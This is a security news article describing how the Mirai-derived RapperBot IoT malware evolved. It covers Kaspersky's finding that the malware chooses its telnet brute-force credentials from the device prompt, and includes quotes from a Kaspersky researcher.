A new version of a Mirai variant called RapperBot is the latest example of malware using relatively uncommon or previously unknown infection vectors to try and spread widely. RapperBot first surfaced last year as Internet of Things (IoT) malware containing large chunks of Mirai source code but with some substantially different functionality compared with other Mirai variants. The differences included the use of a new protocol for command-and-control (C2) communications and a built-in feature for brute-forcing SSH servers rather than Telnet services, as is common in Mirai variants. Constantly Evolving Threat
Researchers from Fortinet tracking the malware last year observed its authors regularly altering the malware, first by adding code to maintain persistence on infected machines even after a reboot, and then with code for self-propagation via a remote binary downloader. Later, the malware authors removed the self-propagation feature and added one that allowed them persistent remote access to brute-forced SSH servers. In the fourth quarter of 2022, Kaspersky’s researchers discovered a new RapperBot variant circulating in the wild, where the SSH brute-force functionality had been removed and replaced with capabilities for targeting telnet servers. Kaspersky’s analysis of the malware showed it also integrated what the security vendor described as an “intelligent” and somewhat uncommon feature for brute-forcing telnet. Rather than brute-forcing with a huge set of credentials, the malware checks the prompts received when it telnets to a device — and based on that, selects the appropriate set of credentials for a brute-force attack. That significantly speeds up the brute-forcing process compared with many other malware tools, Kaspersky said. “When you telnet to a device, you typically get a prompt,” says Jornt van der Wiel, a senior security researcher at Kaspersky. The prompt can reveal some information that RapperBot uses to determine the device it’s targeting and which credentials to use, he says. Depending on the IoT device that is targeted, RapperBot uses different credentials, he says. “So, for device A, it uses user/password set A; and for device B, it uses user/password set B,” van der Wiel says. The malware then uses a variety of possible commands, such as “wget,” “curl,” and “ftpget” to download itself on the target system. If these methods don’t work, the malware uses a downloader and installs itself on the device, according Kaspersky. RapperBot’s brute-force process is relatively uncommon, and van der Weil says he can’t name other malware samples that use the approach. Even so, given the sheer number of malware samples in the wild, it’s impossible to say if it is the only malware currently using this approach. It’s likely not the first piece of malicious code to use the technique, he says.